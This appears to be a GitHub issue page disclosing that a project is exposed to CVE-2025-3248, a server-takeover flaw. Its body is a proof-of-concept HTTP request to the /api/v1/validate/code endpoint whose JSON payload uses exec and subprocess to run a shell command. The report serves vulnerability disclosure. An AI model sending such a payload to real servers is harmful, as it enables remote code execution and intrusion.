Skip to content

存在CVE-2025-3248漏洞可以导致获取服务器权限 #2162

@24-2021

Description

@24-2021

POC
POST /api/v1/validate/code HTTP/1.1
Host: 127.0.0.1:3001
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Content-Length: 106

{"code": "@exec('raise Exception(import("subprocess").check_output(["id"]))')\ndef foo():\n pass"}

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions